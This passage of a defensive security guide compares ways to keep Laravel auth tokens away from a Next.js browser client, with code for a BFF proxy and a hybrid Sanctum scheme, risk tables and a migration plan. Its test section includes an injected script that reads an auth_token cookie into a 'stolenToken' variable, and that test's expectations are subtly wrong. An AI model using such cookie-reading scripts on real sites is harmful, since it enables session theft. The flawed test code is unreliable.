**Complexity:** High | **Security Improvement:** Excellent | **Implementation Time:** 3-5 days
|
||
|
|
|
||
|
|
#### Architecture
|
||
|
|
```
|
||
|
|
Next.js Client → Next.js BFF Server → Laravel API
|
||
|
|
↓ (HttpOnly session cookie)
|
||
|
|
Client (no tokens)
|
||
|
|
```
|
||
|
|
|
||
|
|
The BFF acts as a secure proxy and token manager, keeping all tokens server-side.
|
||
|
|
|
||
|
|
#### Implementation
|
||
|
|
|
||
|
|
**Step 1: Create BFF Session Management**
|
||
|
|
```typescript
|
||
|
|
// lib/bff/session.ts
|
||
|
|
import { SignJWT, jwtVerify } from 'jose';
|
||
|
|
import { cookies } from 'next/headers';
|
||
|
|
|
||
|
|
const SECRET = new TextEncoder().encode(process.env.SESSION_SECRET!);
|
||
|
|
|
||
|
|
export interface SessionData {
|
||
|
|
userId: string;
|
||
|
|
laravelToken: string; // Stored server-side only
|
||
|
|
expiresAt: number;
|
||
|
|
}
|
||
|
|
|
||
|
|
export async function createSession(data: SessionData): Promise<string> {
|
||
|
|
const token = await new SignJWT({ userId: data.userId })
|
||
|
|
.setProtectedHeader({ alg: 'HS256' })
|
||
|
|
.setExpirationTime('7d')
|
||
|
|
.setIssuedAt()
|
||
|
|
.sign(SECRET);
|
||
|
|
|
||
|
|
const cookieStore = await cookies();
|
||
|
|
cookieStore.set('session', token, {
|
||
|
|
httpOnly: true,
|
||
|
|
secure: process.env.NODE_ENV === 'production',
|
||
|
|
sameSite: 'strict',
|
||
|
|
maxAge: 60 * 60 * 24 * 7,
|
||
|
|
path: '/',
|
||
|
|
});
|
||
|
|
|
||
|
|
// Store Laravel token in Redis/database (not in JWT)
|
||
|
|
await storeTokenInRedis(data.userId, data.laravelToken, data.expiresAt);
|
||
|
|
|
||
|
|
return token;
|
||
|
|
}
|
||
|
|
|
||
|
|
export async function getSession(): Promise<SessionData | null> {
|
||
|
|
const cookieStore = await cookies();
|
||
|
|
const token = cookieStore.get('session')?.value;
|
||
|
|
|
||
|
|
if (!token) return null;
|
||
|
|
|
||
|
|
try {
|
||
|
|
const { payload } = await jwtVerify(token, SECRET);
|
||
|
|
const userId = payload.userId as string;
|
||
|
|
|
||
|
|
// Retrieve Laravel token from Redis
|
||
|
|
const laravelToken = await getTokenFromRedis(userId);
|
||
|
|
|
||
|
|
if (!laravelToken) return null;
|
||
|
|
|
||
|
|
return {
|
||
|
|
userId,
|
||
|
|
laravelToken,
|
||
|
|
expiresAt: payload.exp! * 1000,
|
||
|
|
};
|
||
|
|
} catch {
|
||
|
|
return null;
|
||
|
|
}
|
||
|
|
}
|
||
|
|
|
||
|
|
// Redis token storage (example with ioredis)
|
||
|
|
import Redis from 'ioredis';
|
||
|
|
const redis = new Redis(process.env.REDIS_URL!);
|
||
|
|
|
||
|
|
async function storeTokenInRedis(userId: string, token: string, expiresAt: number) {
|
||
|
|
const ttl = Math.floor((expiresAt - Date.now()) / 1000);
|
||
|
|
await redis.setex(`token:${userId}`, ttl, token);
|
||
|
|
}
|
||
|
|
|
||
|
|
async function getTokenFromRedis(userId: string): Promise<string | null> {
|
||
|
|
return await redis.get(`token:${userId}`);
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 2: Create BFF Login Endpoint**
|
||
|
|
```typescript
|
||
|
|
// app/api/bff/auth/login/route.ts
|
||
|
|
import { NextRequest, NextResponse } from 'next/server';
|
||
|
|
import { createSession } from '@/lib/bff/session';
|
||
|
|
|
||
|
|
export async function POST(request: NextRequest) {
|
||
|
|
const { email, password } = await request.json();
|
||
|
|
|
||
|
|
// Authenticate with Laravel
|
||
|
|
const response = await fetch(`${process.env.LARAVEL_API_URL}/api/login`, {
|
||
|
|
method: 'POST',
|
||
|
|
headers: { 'Content-Type': 'application/json' },
|
||
|
|
body: JSON.stringify({ email, password })
|
||
|
|
});
|
||
|
|
|
||
|
|
const data = await response.json();
|
||
|
|
|
||
|
|
if (response.ok && data.token) {
|
||
|
|
// Create BFF session (Laravel token stored server-side)
|
||
|
|
await createSession({
|
||
|
|
userId: data.user.id,
|
||
|
|
laravelToken: data.token,
|
||
|
|
expiresAt: Date.now() + (7 * 24 * 60 * 60 * 1000),
|
||
|
|
});
|
||
|
|
|
||
|
|
// Return user data only (no tokens)
|
||
|
|
return NextResponse.json({
|
||
|
|
user: data.user,
|
||
|
|
success: true
|
||
|
|
});
|
||
|
|
}
|
||
|
|
|
||
|
|
return NextResponse.json(
|
||
|
|
{ error: 'Invalid credentials' },
|
||
|
|
{ status: 401 }
|
||
|
|
);
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 3: Create BFF API Proxy**
|
||
|
|
```typescript
|
||
|
|
// app/api/bff/proxy/[...path]/route.ts
|
||
|
|
import { NextRequest, NextResponse } from 'next/server';
|
||
|
|
import { getSession } from '@/lib/bff/session';
|
||
|
|
|
||
|
|
export async function GET(
|
||
|
|
request: NextRequest,
|
||
|
|
{ params }: { params: { path: string[] } }
|
||
|
|
) {
|
||
|
|
return proxyRequest(request, params.path, 'GET');
|
||
|
|
}
|
||
|
|
|
||
|
|
export async function POST(request: NextRequest, { params }: { params: { path: string[] } }) {
|
||
|
|
return proxyRequest(request, params.path, 'POST');
|
||
|
|
}
|
||
|
|
|
||
|
|
async function proxyRequest(
|
||
|
|
request: NextRequest,
|
||
|
|
path: string[],
|
||
|
|
method: string
|
||
|
|
) {
|
||
|
|
// Get session (retrieves Laravel token from Redis)
|
||
|
|
const session = await getSession();
|
||
|
|
|
||
|
|
if (!session) {
|
||
|
|
return NextResponse.json(
|
||
|
|
{ error: 'Unauthorized' },
|
||
|
|
{ status: 401 }
|
||
|
|
);
|
||
|
|
}
|
||
|
|
|
||
|
|
const apiPath = path.join('/');
|
||
|
|
const url = `${process.env.LARAVEL_API_URL}/api/${apiPath}`;
|
||
|
|
|
||
|
|
// Forward request with Laravel token (token never reaches client)
|
||
|
|
const response = await fetch(url, {
|
||
|
|
method,
|
||
|
|
headers: {
|
||
|
|
'Authorization': `Bearer ${session.laravelToken}`,
|
||
|
|
'Content-Type': 'application/json',
|
||
|
|
},
|
||
|
|
body: method !== 'GET' ? await request.text() : undefined
|
||
|
|
});
|
||
|
|
|
||
|
|
const data = await response.json();
|
||
|
|
return NextResponse.json(data, { status: response.status });
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 4: Client-Side API Calls**
|
||
|
|
```typescript
|
||
|
|
// lib/api.ts
|
||
|
|
export async function apiCall(endpoint: string, options: RequestInit = {}) {
|
||
|
|
// All calls go through BFF (no token management on client)
|
||
|
|
const response = await fetch(`/api/bff/proxy/${endpoint}`, options);
|
||
|
|
|
||
|
|
if (response.status === 401) {
|
||
|
|
// Session expired
|
||
|
|
window.location.href = '/login';
|
||
|
|
}
|
||
|
|
|
||
|
|
return response;
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 5: Middleware Protection**
|
||
|
|
```typescript
|
||
|
|
// middleware.ts
|
||
|
|
import { NextRequest, NextResponse } from 'next/server';
|
||
|
|
import { getSession } from '@/lib/bff/session';
|
||
|
|
|
||
|
|
export async function middleware(request: NextRequest) {
|
||
|
|
const session = await getSession();
|
||
|
|
|
||
|
|
if (!session && request.nextUrl.pathname.startsWith('/dashboard')) {
|
||
|
|
return NextResponse.redirect(new URL('/login', request.url));
|
||
|
|
}
|
||
|
|
|
||
|
|
return NextResponse.next();
|
||
|
|
}
|
||
|
|
|
||
|
|
export const config = {
|
||
|
|
matcher: ['/dashboard/:path*', '/profile/:path*']
|
||
|
|
};
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 6: Add Token Refresh Logic**
|
||
|
|
```typescript
|
||
|
|
// lib/bff/refresh.ts
|
||
|
|
import { getSession, createSession } from './session';
|
||
|
|
|
||
|
|
export async function refreshLaravelToken(): Promise<boolean> {
|
||
|
|
const session = await getSession();
|
||
|
|
|
||
|
|
if (!session) return false;
|
||
|
|
|
||
|
|
// Call Laravel token refresh endpoint
|
||
|
|
const response = await fetch(`${process.env.LARAVEL_API_URL}/api/auth/refresh`, {
|
||
|
|
method: 'POST',
|
||
|
|
headers: {
|
||
|
|
'Authorization': `Bearer ${session.laravelToken}`,
|
||
|
|
},
|
||
|
|
});
|
||
|
|
|
||
|
|
if (response.ok) {
|
||
|
|
const data = await response.json();
|
||
|
|
|
||
|
|
// Update stored token
|
||
|
|
await createSession({
|
||
|
|
userId: session.userId,
|
||
|
|
laravelToken: data.token,
|
||
|
|
expiresAt: Date.now() + (7 * 24 * 60 * 60 * 1000),
|
||
|
|
});
|
||
|
|
|
||
|
|
return true;
|
||
|
|
}
|
||
|
|
|
||
|
|
return false;
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
#### Pros
|
||
|
|
- ✅ **Maximum security** - tokens never reach client
|
||
|
|
- ✅ HttpOnly session cookies (XSS resistant)
|
||
|
|
- ✅ Centralized token management (BFF controls all tokens)
|
||
|
|
- ✅ Token rotation without client awareness
|
||
|
|
- ✅ Single authentication boundary (BFF)
|
||
|
|
- ✅ Easy to add additional security layers (rate limiting, fraud detection)
|
||
|
|
- ✅ Clean separation of concerns
|
||
|
|
|
||
|
|
#### Cons
|
||
|
|
- ⚠️ High complexity (new architecture layer)
|
||
|
|
- ⚠️ Requires infrastructure (Redis/database for token storage)
|
||
|
|
- ⚠️ Additional latency (Next.js → BFF → Laravel)
|
||
|
|
- ⚠️ Increased operational overhead (BFF maintenance)
|
||
|
|
- ⚠️ Session state management complexity
|
||
|
|
- ⚠️ Not suitable for serverless (requires stateful backend)
|
||
|
|
|
||
|
|
#### When to Use
|
||
|
|
- ✅ Enterprise applications with high security requirements
|
||
|
|
- ✅ Team has resources for complex architecture
|
||
|
|
- ✅ Need centralized token management
|
||
|
|
- ✅ Multiple clients (web + mobile) sharing backend
|
||
|
|
- ✅ Microservices architecture
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
### Solution 5: Hybrid Approach (Sanctum Sessions + Short-Lived Access Tokens)
|
||
|
|
**Complexity:** Medium-High | **Security Improvement:** Excellent | **Implementation Time:** 2-3 days
|
||
|
|
|
||
|
|
#### Architecture
|
||
|
|
```
|
||
|
|
Next.js → Laravel Sanctum Session Cookie → Short-lived access token → API
|
||
|
|
(HttpOnly, long-lived) (in-memory, 15min TTL)
|
||
|
|
```
|
||
|
|
|
||
|
|
Combines session security with token flexibility.
|
||
|
|
|
||
|
|
#### Implementation
|
||
|
|
|
||
|
|
**Step 1: Laravel Token Issuance Endpoint**
|
||
|
|
```php
|
||
|
|
// Laravel: routes/api.php
|
||
|
|
Route::middleware('auth:sanctum')->group(function () {
|
||
|
|
Route::post('/token/issue', function (Request $request) {
|
||
|
|
$user = $request->user();
|
||
|
|
|
||
|
|
// Issue short-lived personal access token
|
||
|
|
$token = $user->createToken('access', ['*'], now()->addMinutes(15));
|
||
|
|
|
||
|
|
return response()->json([
|
||
|
|
'token' => $token->plainTextToken,
|
||
|
|
'expires_at' => now()->addMinutes(15)->timestamp,
|
||
|
|
]);
|
||
|
|
});
|
||
|
|
});
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 2: Next.js Token Management Hook**
|
||
|
|
```typescript
|
||
|
|
// hooks/useAccessToken.ts
|
||
|
|
import { useState, useEffect, useCallback } from 'react';
|
||
|
|
|
||
|
|
interface TokenData {
|
||
|
|
token: string;
|
||
|
|
expiresAt: number;
|
||
|
|
}
|
||
|
|
|
||
|
|
let tokenCache: TokenData | null = null; // In-memory only
|
||
|
|
|
||
|
|
export function useAccessToken() {
|
||
|
|
const [token, setToken] = useState<string | null>(null);
|
||
|
|
|
||
|
|
const refreshToken = useCallback(async () => {
|
||
|
|
// Check cache first
|
||
|
|
if (tokenCache && tokenCache.expiresAt > Date.now() + 60000) {
|
||
|
|
setToken(tokenCache.token);
|
||
|
|
return tokenCache.token;
|
||
|
|
}
|
||
|
|
|
||
|
|
try {
|
||
|
|
// Request new token using Sanctum session
|
||
|
|
const response = await fetch('/api/token/issue', {
|
||
|
|
method: 'POST',
|
||
|
|
credentials: 'include', // Send session cookie
|
||
|
|
});
|
||
|
|
|
||
|
|
if (response.ok) {
|
||
|
|
const data = await response.json();
|
||
|
|
|
||
|
|
// Store in memory only (never localStorage)
|
||
|
|
tokenCache = {
|
||
|
|
token: data.token,
|
||
|
|
expiresAt: data.expires_at * 1000,
|
||
|
|
};
|
||
|
|
|
||
|
|
setToken(data.token);
|
||
|
|
return data.token;
|
||
|
|
}
|
||
|
|
} catch (error) {
|
||
|
|
console.error('Token refresh failed', error);
|
||
|
|
}
|
||
|
|
|
||
|
|
return null;
|
||
|
|
}, []);
|
||
|
|
|
||
|
|
useEffect(() => {
|
||
|
|
refreshToken();
|
||
|
|
|
||
|
|
// Auto-refresh every 10 minutes (before 15min expiry)
|
||
|
|
const interval = setInterval(refreshToken, 10 * 60 * 1000);
|
||
|
|
|
||
|
|
return () => clearInterval(interval);
|
||
|
|
}, [refreshToken]);
|
||
|
|
|
||
|
|
return { token, refreshToken };
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 3: Secure API Client**
|
||
|
|
```typescript
|
||
|
|
// lib/api-client.ts
|
||
|
|
import { useAccessToken } from '@/hooks/useAccessToken';
|
||
|
|
|
||
|
|
export function useApiClient() {
|
||
|
|
const { token, refreshToken } = useAccessToken();
|
||
|
|
|
||
|
|
const apiCall = async (endpoint: string, options: RequestInit = {}) => {
|
||
|
|
if (!token) {
|
||
|
|
await refreshToken();
|
||
|
|
}
|
||
|
|
|
||
|
|
const response = await fetch(`${process.env.LARAVEL_API_URL}/api/${endpoint}`, {
|
||
|
|
...options,
|
||
|
|
headers: {
|
||
|
|
'Authorization': `Bearer ${token}`,
|
||
|
|
'Content-Type': 'application/json',
|
||
|
|
...options.headers,
|
||
|
|
},
|
||
|
|
});
|
||
|
|
|
||
|
|
// Handle token expiration
|
||
|
|
if (response.status === 401) {
|
||
|
|
const newToken = await refreshToken();
|
||
|
|
|
||
|
|
if (newToken) {
|
||
|
|
// Retry with new token
|
||
|
|
return fetch(`${process.env.LARAVEL_API_URL}/api/${endpoint}`, {
|
||
|
|
...options,
|
||
|
|
headers: {
|
||
|
|
'Authorization': `Bearer ${newToken}`,
|
||
|
|
'Content-Type': 'application/json',
|
||
|
|
...options.headers,
|
||
|
|
},
|
||
|
|
});
|
||
|
|
}
|
||
|
|
}
|
||
|
|
|
||
|
|
return response;
|
||
|
|
};
|
||
|
|
|
||
|
|
return { apiCall };
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 4: Login Flow (Sanctum Session)**
|
||
|
|
```typescript
|
||
|
|
// app/actions/auth.ts
|
||
|
|
'use server';
|
||
|
|
|
||
|
|
export async function login(formData: FormData) {
|
||
|
|
const email = formData.get('email') as string;
|
||
|
|
const password = formData.get('password') as string;
|
||
|
|
|
||
|
|
// Get CSRF cookie
|
||
|
|
await fetch(`${process.env.LARAVEL_API_URL}/sanctum/csrf-cookie`, {
|
||
|
|
credentials: 'include',
|
||
|
|
});
|
||
|
|
|
||
|
|
// Login (creates Sanctum session)
|
||
|
|
const response = await fetch(`${process.env.LARAVEL_API_URL}/login`, {
|
||
|
|
method: 'POST',
|
||
|
|
headers: {
|
||
|
|
'Content-Type': 'application/json',
|
||
|
|
},
|
||
|
|
credentials: 'include',
|
||
|
|
body: JSON.stringify({ email, password }),
|
||
|
|
});
|
||
|
|
|
||
|
|
if (!response.ok) {
|
||
|
|
return { error: 'Invalid credentials' };
|
||
|
|
}
|
||
|
|
|
||
|
|
// Session cookie is set (HttpOnly)
|
||
|
|
// No tokens stored on client yet
|
||
|
|
|
||
|
|
return { success: true };
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 5: Next.js API Proxy for Token Issuance**
|
||
|
|
```typescript
|
||
|
|
// app/api/token/issue/route.ts
|
||
|
|
import { NextRequest, NextResponse } from 'next/server';
|
||
|
|
|
||
|
|
export async function POST(request: NextRequest) {
|
||
|
|
// Forward session cookie to Laravel
|
||
|
|
const response = await fetch(`${process.env.LARAVEL_API_URL}/api/token/issue`, {
|
||
|
|
method: 'POST',
|
||
|
|
headers: {
|
||
|
|
'Cookie': request.headers.get('cookie') || '',
|
||
|
|
},
|
||
|
|
credentials: 'include',
|
||
|
|
});
|
||
|
|
|
||
|
|
if (response.ok) {
|
||
|
|
const data = await response.json();
|
||
|
|
return NextResponse.json(data);
|
||
|
|
}
|
||
|
|
|
||
|
|
return NextResponse.json(
|
||
|
|
{ error: 'Token issuance failed' },
|
||
|
|
{ status: response.status }
|
||
|
|
);
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
#### Pros
|
||
|
|
- ✅ Long-lived session security (HttpOnly cookie)
|
||
|
|
- ✅ Short-lived token reduces exposure window (15min)
|
||
|
|
- ✅ In-memory tokens (never localStorage)
|
||
|
|
- ✅ Automatic token rotation
|
||
|
|
- ✅ Combines Sanctum sessions with API tokens
|
||
|
|
- ✅ Flexible for different API patterns
|
||
|
|
|
||
|
|
#### Cons
|
||
|
|
- ⚠️ Complex token lifecycle management
|
||
|
|
- ⚠️ Requires both session and token authentication
|
||
|
|
- ⚠️ In-memory tokens lost on tab close/refresh
|
||
|
|
- ⚠️ Additional API calls for token issuance
|
||
|
|
- ⚠️ Backend must support both auth methods
|
||
|
|
|
||
|
|
#### When to Use
|
||
|
|
- ✅ Need both session and token benefits
|
||
|
|
- ✅ High-security requirements
|
||
|
|
- ✅ Complex API authentication needs
|
||
|
|
- ✅ Team experienced with hybrid auth patterns
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
## 4. Comparison Matrix
|
||
|
|
|
||
|
|
| Solution | Security | Complexity | Laravel Changes | Implementation Time | Production Ready | Recommended |
|
||
|
|
|----------|----------|------------|-----------------|---------------------|------------------|-------------|
|
||
|
|
| **1. HttpOnly Proxy** | 🟢 High | 🟢 Low | None | 2-4 hours | ✅ Yes | 🟡 Quick Fix |
|
||
|
|
| **2. Sanctum Sessions** | 🟢 Excellent | 🟡 Medium | Moderate | 1-2 days | ✅ Yes | ✅ **Recommended** |
|
||
|
|
| **3. Token Encryption** | 🟡 Medium | 🟢 Low-Medium | None | 4-6 hours | ⚠️ Defense-in-Depth Only | ❌ Not Primary |
|
||
|
|
| **4. BFF Pattern** | 🟢 Excellent | 🔴 High | None | 3-5 days | ✅ Yes (w/ infra) | 🟡 Enterprise Only |
|
||
|
|
| **5. Hybrid Approach** | 🟢 Excellent | 🟡 Medium-High | Moderate | 2-3 days | ✅ Yes | 🟡 Advanced |
|
||
|
|
|
||
|
|
### Security Risk Reduction
|
||
|
|
|
||
|
|
| Solution | XSS Protection | CSRF Protection | Token Exposure | Overall Risk |
|
||
|
|
|----------|----------------|-----------------|----------------|--------------|
|
||
|
|
| **Current** | ❌ None | 🟡 Partial (SameSite) | 🔴 High | 🔴 **Critical (7.6)** |
|
||
|
|
| **1. HttpOnly Proxy** | ✅ Full | ✅ Full | 🟢 Low | 🟢 **Low (2.8)** |
|
||
|
|
| **2. Sanctum Sessions** | ✅ Full | ✅ Full (CSRF token) | 🟢 Minimal | 🟢 **Minimal (1.5)** |
|
||
|
|
| **3. Token Encryption** | ⚠️ Partial | 🟡 Partial | 🟡 Medium | 🟡 **Medium (5.2)** |
|
||
|
|
| **4. BFF Pattern** | ✅ Full | ✅ Full | 🟢 None (server-only) | 🟢 **Minimal (1.2)** |
|
||
|
|
| **5. Hybrid** | ✅ Full | ✅ Full | 🟢 Low (short-lived) | 🟢 **Low (2.0)** |
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
## 5. Final Recommendation
|
||
|
|
|
||
|
|
### Primary Recommendation: Solution 2 - Sanctum Cookie-Based Sessions
|
||
|
|
|
||
|
|
**Rationale:**
|
||
|
|
1. **Laravel Sanctum's Official Pattern** - This is explicitly designed for your use case
|
||
|
|
2. **Best Security** - HttpOnly cookies + built-in CSRF protection + no token exposure
|
||
|
|
3. **Simplicity** - Leverages Laravel's built-in session system (no custom token management)
|
||
|
|
4. **Production-Ready** - Battle-tested pattern used by thousands of Laravel SPAs
|
||
|
|
5. **Maintainability** - Less code to maintain, framework handles security
|
||
|
|
|
||
|
|
### Implementation Roadmap
|
||
|
|
|
||
|
|
#### Phase 1: Preparation (Day 1)
|
||
|
|
1. Configure Laravel Sanctum for stateful authentication
|
||
|
|
2. Update CORS settings to support credentials
|
||
|
|
3. Test CSRF cookie endpoint
|
||
|
|
4. Configure session driver (database/redis recommended for production)
|
||
|
|
|
||
|
|
#### Phase 2: Authentication Flow (Day 1-2)
|
||
|
|
1. Create Next.js Server Actions for login/logout
|
||
|
|
2. Implement CSRF cookie fetching
|
||
|
|
3. Update login UI to use Server Actions
|
||
|
|
4. Test authentication flow end-to-end
|
||
|
|
|
||
|
|
#### Phase 3: API Integration (Day 2)
|
||
|
|
1. Create Next.js Route Handlers for API proxying
|
||
|
|
2. Update client-side API calls to use Route Handlers
|
||
|
|
3. Implement cookie forwarding in Route Handlers
|
||
|
|
4. Test protected API endpoints
|
||
|
|
|
||
|
|
#### Phase 4: Middleware & Protection (Day 2)
|
||
|
|
1. Implement Next.js middleware for route protection
|
||
|
|
2. Add session verification with Laravel
|
||
|
|
3. Handle authentication redirects
|
||
|
|
4. Test protected routes
|
||
|
|
|
||
|
|
#### Phase 5: Migration & Cleanup (Day 3)
|
||
|
|
1. Gradually migrate existing localStorage code
|
||
|
|
2. Remove localStorage token storage
|
||
|
|
3. Remove non-HttpOnly cookie code
|
||
|
|
4. Comprehensive testing (unit, integration, E2E)
|
||
|
|
|
||
|
|
### Fallback Recommendation: Solution 1 - HttpOnly Proxy
|
||
|
|
|
||
|
|
**If you cannot modify Laravel backend immediately:**
|
||
|
|
- Implement Solution 1 as an interim measure
|
||
|
|
- Migrate to Solution 2 when backend changes are possible
|
||
|
|
- Solution 1 provides 80% of the security benefit with minimal backend changes
|
||
|
|
|
||
|
|
### Not Recommended: Solution 3 - Token Encryption
|
||
|
|
|
||
|
|
**Why not:**
|
||
|
|
- Provides false sense of security
|
||
|
|
- Still fundamentally vulnerable to XSS
|
||
|
|
- Adds complexity without significant security benefit
|
||
|
|
- Should only be used as defense-in-depth alongside other solutions
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
## 6. Additional Security Best Practices
|
||
|
|
|
||
|
|
### 1. Content Security Policy (CSP)
|
||
|
|
```typescript
|
||
|
|
// next.config.js
|
||
|
|
module.exports = {
|
||
|
|
async headers() {
|
||
|
|
return [
|
||
|
|
{
|
||
|
|
source: '/:path*',
|
||
|
|
headers: [
|
||
|
|
{
|
||
|
|
key: 'Content-Security-Policy',
|
||
|
|
value: [
|
||
|
|
"default-src 'self'",
|
||
|
|
"script-src 'self' 'strict-dynamic'",
|
||
|
|
"style-src 'self' 'unsafe-inline'",
|
||
|
|
"img-src 'self' data: https:",
|
||
|
|
"font-src 'self' data:",
|
||
|
|
"connect-src 'self' " + process.env.LARAVEL_API_URL,
|
||
|
|
"frame-ancestors 'none'",
|
||
|
|
"base-uri 'self'",
|
||
|
|
"form-action 'self'"
|
||
|
|
].join('; ')
|
||
|
|
}
|
||
|
|
]
|
||
|
|
}
|
||
|
|
];
|
||
|
|
}
|
||
|
|
};
|
||
|
|
```
|
||
|
|
|
||
|
|
### 2. Security Headers
|
||
|
|
```typescript
|
||
|
|
// middleware.ts
|
||
|
|
export function middleware(request: NextRequest) {
|
||
|
|
const response = NextResponse.next();
|
||
|
|
|
||
|
|
response.headers.set('X-Frame-Options', 'DENY');
|
||
|
|
response.headers.set('X-Content-Type-Options', 'nosniff');
|
||
|
|
response.headers.set('X-XSS-Protection', '1; mode=block');
|
||
|
|
response.headers.set('Referrer-Policy', 'strict-origin-when-cross-origin');
|
||
|
|
response.headers.set('Permissions-Policy', 'camera=(), microphone=(), geolocation=()');
|
||
|
|
|
||
|
|
return response;
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
### 3. Token Rotation
|
||
|
|
```php
|
||
|
|
// Laravel: Automatic token rotation
|
||
|
|
Route::middleware('auth:sanctum')->get('/user', function (Request $request) {
|
||
|
|
// Rotate session ID periodically
|
||
|
|
$request->session()->regenerate();
|
||
|
|
|
||
|
|
return $request->user();
|
||
|
|
});
|
||
|
|
```
|
||
|
|
|
||
|
|
### 4. Rate Limiting
|
||
|
|
```php
|
||
|
|
// Laravel: config/sanctum.php
|
||
|
|
'middleware' => [
|
||
|
|
'throttle:api', // Add rate limiting
|
||
|
|
'verify_csrf_token' => App\Http\Middleware\VerifyCsrfToken::class,
|
||
|
|
];
|
||
|
|
```
|
||
|
|
|
||
|
|
### 5. Monitoring & Alerting
|
||
|
|
```typescript
|
||
|
|
// Monitor authentication anomalies
|
||
|
|
export async function logAuthEvent(event: string, metadata: any) {
|
||
|
|
await fetch('/api/security/log', {
|
||
|
|
method: 'POST',
|
||
|
|
body: JSON.stringify({
|
||
|
|
event,
|
||
|
|
metadata,
|
||
|
|
timestamp: Date.now(),
|
||
|
|
userAgent: navigator.userAgent,
|
||
|
|
})
|
||
|
|
});
|
||
|
|
}
|
||
|
|
|
||
|
|
// Call on suspicious activities
|
||
|
|
logAuthEvent('multiple_login_failures', { email });
|
||
|
|
logAuthEvent('session_hijacking_detected', { oldIp, newIp });
|
||
|
|
```
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
## 7. Migration Checklist
|
||
|
|
|
||
|
|
### Pre-Migration
|
||
|
|
- [ ] Audit current authentication flows
|
||
|
|
- [ ] Identify all API endpoints using Bearer tokens
|
||
|
|
- [ ] Document current user sessions and states
|
||
|
|
- [ ] Backup authentication configuration
|
||
|
|
- [ ] Set up staging environment for testing
|
||
|
|
|
||
|
|
### During Migration
|
||
|
|
- [ ] Implement new authentication pattern
|
||
|
|
- [ ] Update all API calls to use new method
|
||
|
|
- [ ] Test authentication flows (login, logout, session timeout)
|
||
|
|
- [ ] Test protected routes and middleware
|
||
|
|
- [ ] Verify CSRF protection is working
|
||
|
|
- [ ] Load test authentication endpoints
|
||
|
|
- [ ] Security audit of new implementation
|
||
|
|
|
||
|
|
### Post-Migration
|
||
|
|
- [ ] Remove localStorage token storage code
|
||
|
|
- [ ] Remove non-HttpOnly cookie code
|
||
|
|
- [ ] Update documentation for developers
|
||
|
|
- [ ] Monitor error rates and authentication metrics
|
||
|
|
- [ ] Force logout all existing sessions (optional)
|
||
|
|
- [ ] Communicate changes to users if needed
|
||
|
|
|
||
|
|
### Rollback Plan
|
||
|
|
- [ ] Keep old authentication code commented (not deleted) for 1 sprint
|
||
|
|
- [ ] Maintain backward compatibility during transition period
|
||
|
|
- [ ] Document rollback procedure
|
||
|
|
- [ ] Monitor user complaints and authentication errors
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
## 8. Testing Strategy
|
||
|
|
|
||
|
|
### Security Testing
|
||
|
|
```typescript
|
||
|
|
// Test 1: Verify tokens not in localStorage
|
||
|
|
test('tokens should not be in localStorage', () => {
|
||
|
|
const token = localStorage.getItem('token');
|
||
|
|
const authToken = localStorage.getItem('auth_token');
|
||
|
|
|
||
|
|
expect(token).toBeNull();
|
||
|
|
expect(authToken).toBeNull();
|
||
|
|
});
|
||
|
|
|
||
|
|
// Test 2: Verify HttpOnly cookies cannot be accessed
|
||
|
|
test('auth cookies should be HttpOnly', () => {
|
||
|
|
const cookies = document.cookie;
|
||
|
|
|
||
|
|
expect(cookies).not.toContain('auth_token');
|
||
|
|
expect(cookies).not.toContain('laravel_session');
|
||
|
|
});
|
||
|
|
|
||
|
|
// Test 3: Verify CSRF protection
|
||
|
|
test('API calls without CSRF token should fail', async () => {
|
||
|
|
const response = await fetch('/api/protected', {
|
||
|
|
method: 'POST',
|
||
|
|
// No CSRF token
|
||
|
|
});
|
||
|
|
|
||
|
|
expect(response.status).toBe(419); // CSRF token mismatch
|
||
|
|
});
|
||
|
|
|
||
|
|
// Test 4: XSS injection attempt
|
||
|
|
test('XSS should not access auth cookies', () => {
|
||
|
|
const script = document.createElement('script');
|
||
|
|
script.innerHTML = `
|
||
|
|
try {
|
||
|
|
const token = document.cookie.match(/auth_token=([^;]+)/);
|
||
|
|
window.stolenToken = token;
|
||
|
|
} catch (e) {
|
||
|
|
window.xssFailed = true;
|
||
|
|
}
|
||
|
|
`;
|
||
|
|
document.body.appendChild(script);
|
||
|
|
|
||
|
|
expect(window.stolenToken).toBeUndefined();
|
||
|
|
expect(window.xssFailed).toBe(true);
|
||
|
|
});
|
||
|
|
```
|
||
|
|
|
||
|
|
### Integration Testing
|
||
|
|
```typescript
|
||
|
|
// Test authentication flow
|
||
|
|
test('complete authentication flow', async () => {
|
||
|
|
// 1. Get CSRF cookie
|
||
|
|
await fetch('/sanctum/csrf-cookie');
|
||
|
|
|
||
|
|
// 2. Login
|
||
|
|
const loginResponse = await fetch('/login', {
|
||
|
|
method: 'POST',
|
||
|
|
credentials: 'include',
|
||
|
|
body: JSON.stringify({ email: 'test@example.com', password: 'password' })
|
||
|
|
});
|
||
|
|
|
||
|
|
expect(loginResponse.ok).toBe(true);
|
||
|
|
|
||
|
|
// 3. Access protected resource
|
||
|
|
const userResponse = await fetch('/api/user', {
|
||
|
|
credentials: 'include'
|
||
|
|
});
|
||
|
|
|
||
|
|
expect(userResponse.ok).toBe(true);
|
||
|
|
|
||
|
|
// 4. Logout
|
||
|
|
const logoutResponse = await fetch('/logout', {
|
||
|
|
method: 'POST',
|
||
|
|
credentials: 'include'
|
||
|
|
});
|
||
|
|
|
||
|
|
expect(logoutResponse.ok).toBe(true);
|
||
|
|
|
||
|
|
